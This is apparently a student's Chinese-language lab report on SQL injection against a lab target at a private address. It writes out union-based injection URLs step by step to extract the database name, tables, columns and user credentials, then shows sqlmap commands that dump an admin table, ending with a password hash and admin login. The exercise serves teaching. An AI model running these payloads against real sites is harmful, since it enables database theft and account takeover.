实验目的
使学员了解SQL注入的原理和利用方法
实验内容
- 实验靶机URL:http://10.110.2.145:8008/
- 通过手工注入获取admin账户的密码
- 实验过程进行截图,要求必须要有payload和结果截图
实验过程截图
- SQL手工注入
http://10.110.2.145:8008/article.php?id=1 and 1=1????? #有回显
http://10.110.2.145:8008/article.php?id=1 and 1=2????? #无回显
Order by 判断字段数
http://10.110.2.145:8008/article.php?id=1 order by 18???????? #有回显
http://10.110.2.145:8008/article.php?id=1 order by 19???????? #无回显
获取当前数据库:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
获取当前数据库的表:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
获取yzsoumember表的字段:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’yzsoumember’),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
获取yzsoumember表里的username,password字段内容:
http://10.110.2.145:8008/article.php?id=-1 union select 1,(select group_concat(username,password) from jian.yzsoumember),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
- SQLMAP工具注入
sqlmap扫描网站:sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1"
列出数据库名:sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" --dbs
找到dede数据库:
列出dede数据库下的表:
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -tables
找到dede_admin表
显示dede_admin表中所有内容
sqlmap.py -u "http://10.110.2.145:8008/article.php?id=1" -D dede -T dede_admin --dump
Pwd=f297a57a5a743894a0e4
账号admin、密码admin
|